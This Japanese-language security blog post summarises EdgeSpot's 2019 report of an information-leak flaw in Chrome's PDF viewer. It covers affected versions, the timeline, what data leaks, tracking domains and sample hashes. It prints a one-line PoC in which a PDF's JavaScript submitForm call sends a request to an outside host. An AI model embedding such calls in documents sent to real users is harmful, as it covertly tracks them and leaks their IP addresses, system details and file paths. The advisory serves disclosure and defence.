Exploit検出のサービスを公開しているEdgeSpotはChromeのPDFビューワーに情報漏えいの脆弱性が確認されたとして不具合に係る情報を公開しました。ここでは関連する情報をまとめます。
脆弱性の概要
EdgeSpotがChrome PDFビューワーの情報漏えいの脆弱性を次の記事にまとめている。
blog.edgespot.io
概要は以下の通り。
| 影響 | ユーザーが意図せずHTTPリクエストを送出し、情報漏えいする恐れ |
|---|---|
| 影響を受ける対象 | Google Chrome (72.0.3626.119で発生を確認) |
| 脆弱性の名称 | 無し |
| CVE | 確認できず |
| PoC | インターネット上で脆弱性の利用が既に確認されている。 |
| 対策 | 2019/3/1時点で未修正。 修正されるまでAdobe製のPDFリーダーの利用を推奨。 2019年4月下旬ころ修正の予定と発見者は報告。 |
- Edge、Adobe Acrobat Reaer DC、Foxit Readerは脆弱性が発現しないことを確認済。
- Adobe Acrobat Reader DC(既定)の場合はブロックしたと警告が表示される。
脆弱性で漏えいする恐れのある情報
- EdgeSpotは次の3つの情報が外部に漏えいする恐れがあると指摘。
| No | 項目 | 補足 |
|---|---|---|
| 1 | 開封者のIPアドレス | HTTPリクエストが飛ぶため |
| 2 | OS、Chromeのバージョン情報等 | HTTPヘッダに含まれるため |
| 3 | PDF格納先のフルパス(ユーザー名が含まれる恐れ) | HTTP ペイロードに含まれるため |
- 例えば次のように情報を送信する。
経緯
| 日時 | 出来事 |
|---|---|
| 2018年12月下旬以降 | EdgeSpotが脆弱性を利用するPDFの検体を発見 |
| 2018年12月26日 | 調査結果をGoogleへ報告 |
| 2019年2月12日まで | この脆弱性に関連する多数の検体を検出 |
| 2019年2月14日 | GoogleからEdgeSpotに対しChromeの修正は4月下旬見込みとの連絡 |
| 2019年2月26日 | EdgeSpotがChrome PDFビューワーの脆弱性を公開。 |
| 2019年2月28日 | EdgeSpotがメディアの報道にいくつか誤りがあるとして情報をアップデート。 |
実証コード(PoC)
- EdgeSpotはPDFのJavaScript APIにおいて、次のPoCで再現することを確認している。
this.submitForm('http://google.com/test')
脆弱性を利用しているとみられるトラッキングサービス
- 「Re@dNotify」というトラッキングサービスで利用されている可能性がある。
- 添付ファイルを用いた場合のトラッキング設定画面
確認されている検体、接続先
EdgeSpotは脆弱性の利用を確認した接続先として以下の2つを挙げている。
*.readnotify.com *.burpcollaborator.net
piyokangoが確認した検体は以下のもの。
これ以外に報告されている検体。
286ed6d0261aed1115e06e2e8cf0af840297241e9dc9494a496a2c8b75457749
a21a4fcc75cd20a0965f1673b98c0dd688711c40cbabf92a5e5cd1f31a7ac684
1d151793f521419c1470079a37b1e37b8b59a5b69a5506f1d0dbee6f3995b25d
0c3e8efd667f7ff1549bfd2a4498105cb2607314d73b7105f4c1d747d7341090
fb56efe75f3b4509d5a2e0655536d9dab121798d92b8660121bd4691265a87e3
622624d6f161b7d2fa7859d46792dd6bb49024b432b04106b1818510a2037689
0cc1234c981806dd22e0e98e4be002e8df8d285b055e7f891ff8e91af59aee1e
更新履歴
- 2019年3月1日 PM 新規作成
